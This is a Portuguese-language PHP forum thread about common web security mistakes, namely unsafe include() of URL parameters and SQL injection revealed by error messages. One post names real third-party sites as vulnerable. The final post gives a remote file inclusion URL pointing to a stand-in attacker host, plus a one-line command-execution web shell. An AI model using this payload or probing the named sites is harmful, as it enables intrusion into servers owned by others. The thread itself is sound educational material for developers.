Jump to content

Recommended Posts

Posted

Pessoal, alguem pode fazer um mega artigo, ou postar links sobre erros comuns quando se desenvolve um web site usando php que possa por em causa a segurança de um site ?

dando formas de entrar e formas de resolver esse problema por favor..

Posted

Valeu  😛

Umas dúvidas que retirei dos artigos, onde vejo se o URL WRAPPER está activo ? e como é que as pessoas sabem se eu uso algo vulnerável ou não ?

eles por exemplo falam neste erro :

include("topo.php");

include ( $pagina );

include ("down.php");

sendo que o 2nd include está vulnerável, mas como é possivel a alguem ver o meu código ? só se eu o mostrar =D

Posted

Pelo o input no teu site.. quando alguem acessar o teu site numa das páginas a url vai ter um link como por exemplo  http://www.teu-site.com/index.php?pagina=livros.php&id=xxx  ou então http://www.teu-site.com/index.php?pagina=livros&nome=xxx O que esta em bold ajuda o atacante a perceber que aquilo é o include de uma pagina...

$pagina = $_GET['pagina'];

include( $pagina ); ou include( $pagina .".php" );

Posted

claro... mas isso é obvio... por exemplo:

Tens uma pagina em que para mudares de secções utilizas isso, http://www.gurzi.com/index.php?include=lol.php

Ai dá logo para ver a forma que tu usas 😛

E nestas coisas da segurança é mais por tentativa e erro e esse erro deve ser logo dos primeiros 🙂

Yep os erros dizem muita coisa ao atacante... tens aqui um exemplo de um erro que diz muita coisa http://www.eticanatv.org.br/pagina.php?id_pag=22%20SHOW%20TABLES;  "Erro no query" isso mostra ao atacante que esta a ser executado um query a SQL apartir do input da url e o atacante tenta fazer uma SQL Injection ou seja executar querys na SQL apartir da url e pode até descrobrir as passwords ou apagar as tabelas da base de dados etc... Tem que se ter muito cuidado.

EDIT: http://laboratoriopop.uol.com.br/pagina.php?abrir=texto_colunista.php&idcolunista=32 < esse site já tem uma bug

Posted

kingless: por acaso esse site está bastante mal feito mas se a version do php fosse mais antiga estava já offline 😛

Não consegues assessar a files doutro servidor e tem as magic_quotes=on 😛

Posted

kingless: por acaso esse site está bastante mal feito mas se a version do php fosse mais antiga estava já offline 😛

Não consegues assessar a files doutro servidor e tem as magic_quotes=on 😛

Consigo... O meu servidor (local) tem magic_quotes = on e eu consigo acessar as files apartir da url (criei uma bug e fiz um teste agora)

Posted

$_POST só é utilizado em formularios, e os links utilizam $_GET e $_REQUEST

$minha_pagina = $_REQUEST['pagina'];

include( ' $minha_pagina ' );

O atacante só precisa de escrever isso na url

http://www.teu-site.com/index.php?pagina=http://www.atacante.com/ficheiro.txt?&cmd=id

No site do atacante o ficheiro.txt tem o seguinte código

echo system( $_GET['cmd'] );

Este código executa comandos no servidor do site vulneravel...  o include( " $minha_pagina " ); vai incluir o site do atacante no servidor e o site do atacante tem um código que o deixa o atacante executar comandos no servidor e assim ele pode conseguir atacar o site e o servidor.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.